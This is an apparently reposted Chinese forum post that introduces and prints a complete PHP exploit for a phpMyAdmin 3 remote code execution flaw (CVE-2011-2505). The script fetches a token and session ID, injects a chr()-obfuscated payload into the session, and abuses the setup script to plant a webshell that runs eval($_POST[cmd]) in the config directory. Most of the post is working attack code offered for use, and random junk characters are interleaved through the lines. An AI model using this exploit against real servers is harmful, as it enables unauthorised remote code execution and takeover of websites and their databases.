最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
" E+ h5 l5 T$ q) i- X/ T* U
" }4 q+ a; h, C' \昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。& U: W& E: z; _* ?9 J
4 y% S) P8 G5 x" P$ Q {1 {首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:# A2 \2 m3 R) r2 l& ~
一是session.auto_start = 1;
! }/ f2 `& z0 W/ i二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
% Q5 y" a! ~, f% H5 O当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
2 R$ N. T% {, _4 s5 z$ a; W5 c; {# y
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
9 Q& s/ F4 h% w( d8 b4 [4 S0 f, V5 o* D7 [ u) U
于是写了这个php版本的exp,代码如下:8 R$ e" c# {) Y Y: R
( Q8 a! l7 ^- V" u( M) q% I; P' K4 {
#!/usr/bin/php
?1 v* [& K+ [/ G5 Q4 |. D! R3 ?<?php" e, @. F, }: m0 W4 [' E1 j
print_r('
2 {8 N4 n9 c. ?8 j# R$ r6 a+---------------------------------------------------------------------------+
- v& F- A: C5 e3 [pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]6 A# i5 f1 X2 {8 j% _
by oldjun(www.oldjun.com)0 m; e- v) m* b' W8 Z
welcome to www.t00ls.net+ P( B, h- R! Q, K
mail: oldjun@gmail.com
& z+ I9 ~0 c4 @: oAssigned CVE id: CVE-2011-2505
# j( B2 r( U9 o+---------------------------------------------------------------------------+
3 b# ^% G( o" ~1 N');
A: m# ?; J1 C$ A4 f# g) O% e8 L2 `; {* k
/**
) l- M- s, N4 V% l9 o' _ * working when the directory:"config" exists and is writeable.5 X% d# z: p- B9 o3 {
**/; `! x, V& M/ T# m# `1 m- [0 y
+ R! r3 K; t7 T1 }. e+ dif ($argc < 3) {4 O7 {* _: _* ?! j; }
print_r('8 J/ L0 d+ P* L/ t0 Z, w/ j
+---------------------------------------------------------------------------+9 A) C( ~& T8 x2 U
Usage: php '.$argv[0].' host path
0 X& J- c1 |6 H2 e3 uhost: target server (ip/hostname)' Z- i- j6 b, ~
path: path to pma35 e3 j' C7 F3 S8 I+ I* |$ d8 |. H* w
Example:
0 Q$ C5 t9 \. z; Q& D. Cphp '.$argv[0].' localhost /pma/! J0 j$ }- v; s
+---------------------------------------------------------------------------+
8 ?* V( z" s3 O+ T O; O6 ?2 j');/ n- Q/ ?& |! {/ A3 k3 B; q8 ^
exit;
" [" q; M+ H e1 W ~7 e}
?: l- Y/ E _! M6 N8 b' g) h. {) c' w/ C% A2 E4 G, @
$host = $argv[1];/ @$ b! g3 s/ e! P
$path = $argv[2];
# J( N' g6 O# F& C5 N3 O: T# g
5 M6 F1 ^0 s) Q/**
8 q+ o6 f; ^3 ]! \- z * Try to determine if the directory:"config" exists0 J$ O) p4 s# i7 g2 P
**/
2 X6 D7 h! m4 G: Uecho "[+] Try to determine if the directory:config exists....\n";2 g- q/ `# B @% R5 H
$returnstr=php_request('config/');1 ~. c; j7 S; [" l
if(strpos($returnstr,'404')){
$ h7 K, [' p0 u. P8 V# |5 O8 ~ exit("[-] Exploit Failed! The directory:config do not exists!\n");
! Z9 |" T: O; `8 T0 t+ C}% w$ i3 \1 |, A4 W
. W6 x) K' g8 s- I4 J/**# D/ z O8 @# H; }: l- S: x7 V" o
* Try to get token and sessionid9 v( r9 B4 D. \* P% [- Y0 x* L
**/+ a8 A8 L0 a$ i
echo "[+] Try to get token and sessionid....\n";9 P r$ R+ ~2 N9 p
$result=php_request('index.php');
O, i4 U ?% }4 lpreg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
& X0 C' B% M( b8 |2 A$token=$resp[3];
( u7 q. L0 d- z, `$sessionid=$resp[1];
, E4 Y/ a' t, P; mif($token && $sessionid){
& D1 ]# s* b/ j- t7 k. V6 n* J echo "[+] token token\n";( c: i+ W6 j2 F2 X7 |
echo "[+] Session IDsessionid\n";1 r% P5 j* A* k8 b
}else{
( X7 E) g6 b3 O exit("[-] Can't get token and Session ID,Exploit Failed!\n");; w+ R$ S/ U: t) \. C% S% y
}
& ?$ ?. x9 c* a" f& s, v/ [ h% r5 e3 l
/**4 y5 y/ J# E( w: ]! E
* Try to insert shell into session
( | E( a n% k0 Z1 m**/! @0 ?% ^0 b% K$ I# h7 W1 R0 D
echo "[+] Try to insert shell into session....\n";
& M; @* t8 ?5 iphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.+ k- O4 e0 h3 w
" S8 \& P3 B3 y/ V$ N+ v
/**+ f6 t% G9 D# n! y$ d! X
* Try to create webshell
2 j6 r& G; Z9 m0 c$ o8 E, _**/
. _6 \7 b- O# h' i! o5 vecho "[+] Try to create webshell....\n";
5 P& c$ v6 P1 e4 d) h5 Z7 F! n+ ?php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);! S( a: x2 t- h% p5 T
/**4 `) i# V7 y. {7 Q1 |0 n
* Try to check if the webshell was created successfully
$ R d9 w8 e" b8 F**/
- {- {+ k% B3 ^% s6 o: p, [echo "[+] Try to check if the webshell was created successfully....\n";
' [6 E" s6 N* o, [$ v. m0 H$content=php_request('config/config.inc.php');
j% `" w( x% U5 wif(strpos($content,'t00ls')){
8 W# }* H, b7 P. O echo "[+] Congratulations! Expoilt successfully....\n";: ?# j) n. p; ^, d2 R/ X$ ]' s
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
8 T7 E5 W* C Q9 {" x}else{) R' }$ ~! M9 v5 M. f0 o/ J
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");+ p8 P V( s- J/ e
}
/ e0 L% v0 A# O9 e' }$ A; Z. j
Y) b* K# U. O$ E0 Ifunction php_request($url,$data='',$cookie=''){: z# j' O8 Q. J3 |" K$ m0 W
global $host, $path;% R- K/ p( \( m& K- i
: v2 Y5 l! Z+ n; T$ H& m
$method=$data?'POST':'GET';
. i+ l& V* o% q1 I0 f
1 E$ K9 f, p+ E $packet = $method." ".$path.$url." HTTP/1.1\r\n";5 W) ?. H- p5 @$ U/ n7 m
$packet .= "Accept: */*\r\n";4 [8 u( Z1 B. [+ V: T- R
$packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";. `$ R7 T/ D. |- o7 k
$packet .= "Host: $host\r\n";, S2 q* x( p: Q# h# n2 s
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
4 H2 U$ Q; i% J $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";* z' w5 P3 k" F8 N8 B
$packet .= $cookie?"Cookie: $cookie\r\n":""; \! U7 C4 i6 {. E
$packet .= "Connection: Close\r\n\r\n";) B' S" ?" P9 H! y
$packet .= $data?$data:"";! v5 N1 K1 ^5 t2 q) ~) {7 P* [
9 x0 [" ~& Y0 A $fp = fsockopen(gethostbyname($host), 80);
. v7 ]1 Q$ k$ a4 C if (!$fp) {" F- l4 h! T6 t# i' V' n# v
echo 'No response from '.$host; die;
3 K8 ?8 x3 O; q3 \% M2 e" L }
+ m: a' r& B7 U' o) e* ] fputs($fp, $packet);) H% x# v( k3 {! K4 v+ z+ q+ ^+ k8 C
3 l& H) V& o) V
$resp = '';
$ x1 `. D7 n D6 S8 o) q w& ^6 h
* ]. v% p9 ~: {. j( r* P3 } while ($fp && !feof($fp))
" l/ ?/ |; L* F5 [& v( B $resp .= fread($fp, 1024);& g) G) U5 c9 \ }; u+ M
! ^$ i# G& e: T, K* ]
return $resp;( }) }8 T J8 J; T8 J9 k
}
5 V" v7 t$ [9 I, U 9 t. O1 F8 I4 w. F( U; y# W/ r$ g# j
?>
8 R# Q7 O5 g+ ]- A" P5 u1 l. |
发表于 2013-2-21 09:13:03
收藏
支持
反对